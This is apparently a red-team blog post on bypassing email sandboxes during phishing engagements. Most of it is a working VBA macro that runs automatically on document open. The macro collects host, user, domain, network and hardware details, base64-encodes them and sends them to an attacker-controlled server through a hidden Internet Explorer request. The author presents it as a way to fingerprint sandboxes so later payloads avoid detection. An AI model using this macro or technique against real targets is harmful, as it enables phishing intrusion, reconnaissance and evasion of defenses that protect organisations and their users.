I decided to mix things up a little bit and do a blog post on something a little different than the usual vulnerability research or CTF write-ups. The bulk of our day job is focused on performing long term external assessments on customer networks, so I thought it might be useful to others to do a post on some hurdles we have had to overcome recently in regards to phishing.

In our experience, phishing is probably responsible for somewhere around 80% of initial network access from external sources. Unfortunately this is due to poor user security training and a handful of other debatable reasons. To try and solve the overwhelming problem of click-happy users, IT administrators have begun installing hardware devices that sandbox incoming emails that contain macros to determine if they perform malicious activity. These devices have become quite effective in stopping suspicious emails from even reaching users.

If you talk to anyone that has been working in security for any significant amount of time, they will tell you that offensive and defensive techniques evolve directly as a result of advances in the other. In our scenario, offensive tactics consisted of emailing users with macros. As a result, defensive tools were developed to sandbox these emails to identify malicious activity. The next natural progression is offensive techniques that render sand-boxing useless.

Our team had reasonable success bypassing these devices using various tricks employed by modern malware; https://threatpost.com/malware-evades-detection-with-novel-technique/120787/, http://www.securityweek.com/dyre-banking-trojan-counts-processor-cores-detect-sandboxes. Realizing that this problem was only going to become more prevalent, we decided to take the idea behind the above links one step further.

We chose to exploit the function of these devices to bypass them. Given that they are designed to execute all code passed to them in a sandbox, we decided we would target the sand-boxing hardware specifically. We picked an arbitrary email address in the target domain, constructed a blatant phishing email that the target would likely see often, and attached a macro that performed extensive enumeration of any system that ran the macro. The macro then takes the results of this enumeration and posts it back to an attacker controlled server. Using the results from the enumeration script, we are now able to create a macro that will only run on systems that do not match the fingerprint of the data we received from the email sandbox. This test can be repeated as many times as the red teamer feels is necessary to gain confidence in the results. An example enumeration macro is listed below.

Function MakeModel()

 retStr = ""
 strComputer = "."
 strQuery = "SELECT * FROM Win32_ComputerSystem"
 Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
 Set colItems = objWMIService.ExecQuery(strQuery)
 For Each objItem In colItems
 retStr = objItem.Manufacturer
 retStr = retStr & "|" & objItem.Model
 Next
 
 MakeModel = retStr

End Function

Function EnvironVars()
 sHostname = Environ("computername") & "|" & Environ("username") & _
 "|" & Environ("userdomain") & "|" & Environ("LOGONSERVER")
 EnvironVars = sHostname
End Function

Function RecentFiles()
 Set wdApp = ActiveDocument.Application
 RecentFiles = wdApp.RecentFiles.Count
End Function


Function GetCores()
 Dim objWMIService, cores, Proc, strQuery
 strQuery = "select * from Win32_PerfFormattedData_PerfOS_Processor"
 Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\.rootcimv2")
 Set cores = objWMI.ExecQuery(strQuery, , 48)
 Set GetCores = cores
End Function

Function GetNetwork()

 retStr = ""
 strComputer = "."
 strQuery = "Select * From Win32_NetworkAdapter Where PhysicalAdapter = True"
 Set objWMIService = GetObject("winmgmts:\" & strComputer & "rootcimv2")
 Set colItems = objWMIService.ExecQuery(strQuery)
 
 Set ipItems = objWMIService.ExecQuery("Select * From Win32_NetworkAdapterConfiguration")
 
 For Each objItem In colItems
 strMacAddress = objItem.MACAddress
 sysName = objItem.SystemName
 
 For Each ipItem In ipItems
 If ipItem.MACAddress = strMacAddress And ipItem.IPEnabled = "True" Then
 retStr = retStr & strMacAddress & "|" & ipItem.IPAddress(0) & "|"
 Exit For
 End If
 Next
 Next
 
 GetNetwork = retStr

End Function
Private Function Enc(ByVal strData As String) As Byte()
 
 Dim arrData() As Byte
 arrData = StrConv(strData, vbFromUnicode)
 
 Set objXML = CreateObject("MSXml2.DOMDocument")
 Set objDocElem = objXML.createElement("data")
 
 objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
 objDocElem.nodeTypedValue = arrData
 Enc = objDocElem.Text
 
 Set objNode = Nothing
 Set objXML = Nothing
 
End Function
Private Function Dec(ByVal strData As String) As Byte()
 
 Set objXML = CreateObject("MSXml2.DOMDocument")
 Set objDocElem = objXML.createElement("data")
 
 objDocElem.dataType = "bin.base" & Chr(54) & Chr(52)
 objDocElem.Text = strData
 Dec = objDocElem.nodeTypedValue
 
 Set objNode = Nothing
 Set objXML = Nothing
 
End Function
Sub DoStuff(ByVal strData As String)

 Dim IE As Object
 Dim strBaseURL As String
 Dim pre As String
 
 address = "http://127.0.0.1/"
 
 'strBaseURL = StrConv(Dec(address), 64)
 Set IE = CreateObject("InternetExplorer.Application")
 IE.Visible = False
 IE.navigate address & strData
 On Error GoTo ErrorHandler
 Do While IE.Busy: DoEvents: Loop
 Do While IE.ReadyState <> 4: DoEvents: Loop
 Set doc = IE.Document
 If Not IsNull(doc.getElementById("overridelink")) Then
 Set lnkOverRide = doc.getElementById("overridelink")
 If Not lnkOverRide Is Nothing Then
 lnkOverRide.Click
 Do While IE.Busy: DoEvents: Loop
 Do While IE.ReadyState <> 4: DoEvents: Loop
 Set doc = IE.Document
 End If
 Else
 Do While IE.Busy: DoEvents: Loop
 Do While IE.ReadyState <> 4: DoEvents: Loop
 Set doc = IE.Document
 End If
 Dim testString As String
 testString = IE.Document.body.innerText
 IE.Stop
 IE.Quit
 
ErrorHandler:
 Exit Sub
End Sub

Sub AutoOpen()
 Dim retStr As String
 
 Set cores = GetCores
 Length = 0
 For Each i In cores
 Length = Length + 1
 Next
 
 retStr = Str(Length - 1)
 retStr = retStr & "|" & RecentFiles
 retStr = retStr & "|" & EnvironVars
 retStr = retStr & "|" & GetNetwork
 retStr = retStr & "|" & MakeModel
 retStr = Enc(retStr)
 
 DoStuff (retStr)
End Sub

We believe this technique to be reasonably effective against most modern email sandboxes. The only mitigation to this technique is if the results could be randomized or if the outgoing connection with the results was blocked. The first mitigation would be quite difficult since the enumeration script can poll any number of identifying pieces of data. The second would also be difficult since the purpose of the sandbox is to let the malware run in order to profile it.  For now, our team will save a few more hours creating phishing content and a few more dollars buying phishing domains. The ball is back in your court defense.